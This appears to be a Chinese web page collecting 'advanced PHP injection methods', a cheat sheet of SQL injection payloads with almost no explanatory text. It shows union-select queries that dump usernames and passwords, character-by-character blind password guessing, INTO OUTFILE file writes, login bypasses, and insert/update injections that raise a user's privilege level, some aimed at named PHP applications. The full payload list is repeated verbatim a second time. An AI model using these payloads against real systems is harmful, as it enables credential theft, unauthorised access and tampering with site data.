高级php注入方法集锦
2023-06-13 09:14:01 时间
"%23
" and passWord="mypass
id=-1 union select 1,1,1
id=-1 union select char(97),char(97),char(97)
id=1 union select 1,1,1 from members
id=1 union select 1,1,1 from admin
id=1 union select 1,1,1 from user
userid=1 and password=mypass
userid=1 and mid(password,3,1)=char(112)
userid=1 and mid(password,4,1)=char(97)
and ord(mid(password,3,1))>111 (ord函数很好用,可以返回整形的)
" and LENGTH(password)="6(探测密码长度)
" and LEFT(password,1)="m
" and LEFT(password,2)="my
…………………………依次类推
" union select 1,username,password from user/*
" union select 1,username,password from user/*
=" union select 1,username,password from user/* (可以是1或者=后直接跟)
99999" union select 1,username,password from user/*
" into outfile "c:/file.txt (导出文件)
=" or 1=1 into outfile "c:/file.txt
1" union select 1,username,password from user into outfile "c:/user.txt
select password FROM admins where login="John" INTO DUMPFILE "/path/to/site/file.txt"
id=" union select 1,username,password from user into outfile
id=-1 union select 1,database(),version() (灵活应用查询)
常用查询测试语句,
select * FROM table where 1=1
select * FROM table where "uuu"="uuu"
select * FROM table where 1<>2
select * FROM table where 3>2
select * FROM table where 2<3
select * FROM table where 1
select * FROM table where 1+1
select * FROM table where 1--1
select * FROM table where ISNULL(NULL)
select * FROM table where ISNULL(COT(0))
select * FROM table where 1 IS NOT NULL
select * FROM table where NULL IS NULL
select * FROM table where 2 BETWEEN 1 AND 3
select * FROM table where "b" BETWEEN "a" AND "c"
select * FROM table where 2 IN (0,1,2)
select * FROM table where CASE WHEN 1>0 THEN 1 END
例如:夜猫下载系统1.0版本
id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1
union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 (替换,寻找密码)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (验证第一位密码)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (第二位)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51
…………………………………………………………
例如2:灰色轨迹 变换id进行测试(meteor)
union%20(select%20allowsmilies,public,userid,"0000-0-0",user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate
union%20(select%20allowsmilies,public,userid,"0000-0-0",pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate
构造语句:
select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1)
select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,username,password from user where userid=1)
union%20(select%201,0,2,"1999-01-01","a",password%20FROM%20user%20where%20userid%20=%205)%20order%20by%20eventdate
union%20(select%201,0,12695,"1999-01-01","a",password%20FROM%20user%20where%20userid=13465)%20order%20by%20eventdate
union %20(select%201,0,12695,"1999-01-01","a",userid%20FROM%20user%20where%20username ="sandflee")%20order%20by%20eventdate (查沙子的id)
(select a FROM table_name where a=10 AND B=1 ORDER BY a LIMIT 10)
select * FROM article where articleid="$id" union select * FROM……(字段和数据库相同情况下,可直接提交)
select * FROM article where articleid="$id" union select 1,1,1,1,1,1,1 FROM……(不同的情况下)
特殊技巧:在表单,搜索引擎等地方写:
"___"
".__ "
"%
%" ORDER BY articleid/*
%" ORDER BY articleid#
__" ORDER BY articleid/*
__" ORDER BY articleid#
$command = "dir c:\";system($command);
select * FROM article where articleid="$id"
select * FROM article where articleid=$id
1" and 1=2 union select * from user where userid=1/* 句中变为
(select * FROM article where articleid="1" and 1=2 union select * from user where userid=1/*")
1 and 1=2 union select * from user where userid=1
语句形式:建立一个库,插入:
create DATABASE `injection`
create TABLE `user` (
`userid` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default "",
`password` varchar(20) NOT NULL default "",
PRIMARY KEY (`userid`)
) ;
insert INTO `user` VALUES (1, "swap", "mypass");
插如一个注册用户:
insert INTO `user` (userid, username, password, homepage, userlevel) VALUES ("", "$username", "$password", "$homepage", "1");
"insert INTO membres (login,password,nom,email,userlevel) VALUES ("$login","$pass","$nom","$email","1")";
insert INTO membres (login,password,nom,email,userlevel) VALUES ("","","","","3")#","1")
"insert INTO membres SET login="$login",password="$pass",nom="$nom",email="$email"";
insert INTO membres SET login="",password="",nom="",userlevel="3",email=""
"insert INTO membres VALUES ("$id","$login","$pass","$nom","$email","1")";
update user SET password="$password", homepage="$homepage" where id="$id"
update user SET password="MD5(mypass)" where username="admin"#)", homepage="$homepage" where id="$id"
"update membres SET password="$pass",nom="$nom",email="$email" where id="$id"";
update membres SET password="[PASS]",nom="",userlevel="3",email=" " where id="[ID]"
"update news SET Votes=Votes+1, score=score+$note where idnews="$id"";
长用函数:
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
比如:
update article SET title=$title where articleid=1 对应函数
update article SET title=DATABASE() where id=1
#把当前数据库名更新到title字段
update article SET title=USER() where id=1
#把当前 mysql 用户名更新到title字段
update article SET title=SYSTEM_USER() where id=1
#把当前 MySQL 用户名更新到title字段
update article SET title=SESSION_USER() where id=1
#把当前 MySQL 用户名更新到title字段
update article SET title=CURRENT_USER() where id=1
#把当前会话被验证匹配的用户名更新到title字段
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
$req = "select * FROM membres where name like "%$search%" ORDER BY name";
select * FROM membres where name like "%%" ORDER BY uid#%" ORDER BY name
select * FROM membres where name like "%%" ORDER BY uid#%" ORDER BY name
select uid FROM admins where login="" OR "a"="a" AND password="" OR "a"="a" (经典)
select uid FROM admins where login="" OR admin_level=1#" AND password=""
select * FROM table where msg like "%hop"
select uid FROM membres where login="Bob" AND password like "a%"#" AND password=""
select * FROM membres where name like "%%" ORDER BY uid#%" ORDER BY name
" and passWord="mypass
id=-1 union select 1,1,1
id=-1 union select char(97),char(97),char(97)
id=1 union select 1,1,1 from members
id=1 union select 1,1,1 from admin
id=1 union select 1,1,1 from user
userid=1 and password=mypass
userid=1 and mid(password,3,1)=char(112)
userid=1 and mid(password,4,1)=char(97)
and ord(mid(password,3,1))>111 (ord函数很好用,可以返回整形的)
" and LENGTH(password)="6(探测密码长度)
" and LEFT(password,1)="m
" and LEFT(password,2)="my
…………………………依次类推
" union select 1,username,password from user/*
" union select 1,username,password from user/*
=" union select 1,username,password from user/* (可以是1或者=后直接跟)
99999" union select 1,username,password from user/*
" into outfile "c:/file.txt (导出文件)
=" or 1=1 into outfile "c:/file.txt
1" union select 1,username,password from user into outfile "c:/user.txt
select password FROM admins where login="John" INTO DUMPFILE "/path/to/site/file.txt"
id=" union select 1,username,password from user into outfile
id=-1 union select 1,database(),version() (灵活应用查询)
常用查询测试语句,
select * FROM table where 1=1
select * FROM table where "uuu"="uuu"
select * FROM table where 1<>2
select * FROM table where 3>2
select * FROM table where 2<3
select * FROM table where 1
select * FROM table where 1+1
select * FROM table where 1--1
select * FROM table where ISNULL(NULL)
select * FROM table where ISNULL(COT(0))
select * FROM table where 1 IS NOT NULL
select * FROM table where NULL IS NULL
select * FROM table where 2 BETWEEN 1 AND 3
select * FROM table where "b" BETWEEN "a" AND "c"
select * FROM table where 2 IN (0,1,2)
select * FROM table where CASE WHEN 1>0 THEN 1 END
例如:夜猫下载系统1.0版本
id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1
union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 (替换,寻找密码)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (验证第一位密码)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (第二位)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51
…………………………………………………………
例如2:灰色轨迹 变换id进行测试(meteor)
union%20(select%20allowsmilies,public,userid,"0000-0-0",user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate
union%20(select%20allowsmilies,public,userid,"0000-0-0",pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate
构造语句:
select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1)
select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,username,password from user where userid=1)
union%20(select%201,0,2,"1999-01-01","a",password%20FROM%20user%20where%20userid%20=%205)%20order%20by%20eventdate
union%20(select%201,0,12695,"1999-01-01","a",password%20FROM%20user%20where%20userid=13465)%20order%20by%20eventdate
union %20(select%201,0,12695,"1999-01-01","a",userid%20FROM%20user%20where%20username ="sandflee")%20order%20by%20eventdate (查沙子的id)
(select a FROM table_name where a=10 AND B=1 ORDER BY a LIMIT 10)
select * FROM article where articleid="$id" union select * FROM……(字段和数据库相同情况下,可直接提交)
select * FROM article where articleid="$id" union select 1,1,1,1,1,1,1 FROM……(不同的情况下)
特殊技巧:在表单,搜索引擎等地方写:
"___"
".__ "
"%
%" ORDER BY articleid/*
%" ORDER BY articleid#
__" ORDER BY articleid/*
__" ORDER BY articleid#
$command = "dir c:\";system($command);
select * FROM article where articleid="$id"
select * FROM article where articleid=$id
1" and 1=2 union select * from user where userid=1/* 句中变为
(select * FROM article where articleid="1" and 1=2 union select * from user where userid=1/*")
1 and 1=2 union select * from user where userid=1
语句形式:建立一个库,插入:
create DATABASE `injection`
create TABLE `user` (
`userid` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default "",
`password` varchar(20) NOT NULL default "",
PRIMARY KEY (`userid`)
) ;
insert INTO `user` VALUES (1, "swap", "mypass");
插如一个注册用户:
insert INTO `user` (userid, username, password, homepage, userlevel) VALUES ("", "$username", "$password", "$homepage", "1");
"insert INTO membres (login,password,nom,email,userlevel) VALUES ("$login","$pass","$nom","$email","1")";
insert INTO membres (login,password,nom,email,userlevel) VALUES ("","","","","3")#","1")
"insert INTO membres SET login="$login",password="$pass",nom="$nom",email="$email"";
insert INTO membres SET login="",password="",nom="",userlevel="3",email=""
"insert INTO membres VALUES ("$id","$login","$pass","$nom","$email","1")";
update user SET password="$password", homepage="$homepage" where id="$id"
update user SET password="MD5(mypass)" where username="admin"#)", homepage="$homepage" where id="$id"
"update membres SET password="$pass",nom="$nom",email="$email" where id="$id"";
update membres SET password="[PASS]",nom="",userlevel="3",email=" " where id="[ID]"
"update news SET Votes=Votes+1, score=score+$note where idnews="$id"";
长用函数:
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
比如:
update article SET title=$title where articleid=1 对应函数
update article SET title=DATABASE() where id=1
#把当前数据库名更新到title字段
update article SET title=USER() where id=1
#把当前 mysql 用户名更新到title字段
update article SET title=SYSTEM_USER() where id=1
#把当前 MySQL 用户名更新到title字段
update article SET title=SESSION_USER() where id=1
#把当前 MySQL 用户名更新到title字段
update article SET title=CURRENT_USER() where id=1
#把当前会话被验证匹配的用户名更新到title字段
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
$req = "select * FROM membres where name like "%$search%" ORDER BY name";
select * FROM membres where name like "%%" ORDER BY uid#%" ORDER BY name
select * FROM membres where name like "%%" ORDER BY uid#%" ORDER BY name
select uid FROM admins where login="" OR "a"="a" AND password="" OR "a"="a" (经典)
select uid FROM admins where login="" OR admin_level=1#" AND password=""
select * FROM table where msg like "%hop"
select uid FROM membres where login="Bob" AND password like "a%"#" AND password=""
select * FROM membres where name like "%%" ORDER BY uid#%" ORDER BY name
相关文章
- PHP时区设置相差8小时间程序与php.ini配置方法
- PHP之旅---出发(php+apache+MySQL)
- SQL注入之PHP-MySQL实现手工注入-字符型
- MySQL求和算法在PHP中的应用(mysql求和php)
- Linux更新:升级PHP版本(linux更新php版本)
- MySQL数据库管理应用PHP技术(mysql数据库php)
- Linux重启PHP的命令操作指南(linux重启php命令)
- PHP连接MSSQL库的方法(php链接mssql)
- PHP原生编程实现MySQL数据库连接(php原生连接mysql)
- MySQL封装,PHP解决方案(php封装mysql)
- PHP与MySQL结合使用实现关联查询的方法(php关联mysql查询)
- 慢解决PHP连接MySQL慢的方法(php连接mysql时间)
- 学习PHP提升Linux技能(php学linux)
- PHP从Linux中读取文件的方法(php读取linux文件)
- Linux下简易安装 PHP(linux下php安装)
- PHP访问MSSQL数据库的实现方法(php 读取 mssql)
- PHP无法连接MSSQL服务器(php 读不到mssql)
- PHP如何连接MySQL数据库?(php如何连接mysql数据库)
- Linux查看PHP版本的方法简介(linux查看php版本)
- 基于PHP的Redis队列监控实践(redis队列监控php)
- php-accelerator网站加速PHP缓冲的方法
- php学习笔记PHP面向对象的程序设计
- 不重新编译PHP为php增加openssl模块的方法
- php去除换行符的方法小结(PHP_EOL变量的使用)
- php中防止SQL注入的最佳解决方法
- sql注入与转义的php函数代码
- php另类上传图片的方法(PHP用Socket上传图片)
- php使用execshell命令注入的方法讲解
- php+mysqli实现批量执行插入、更新及删除数据的方法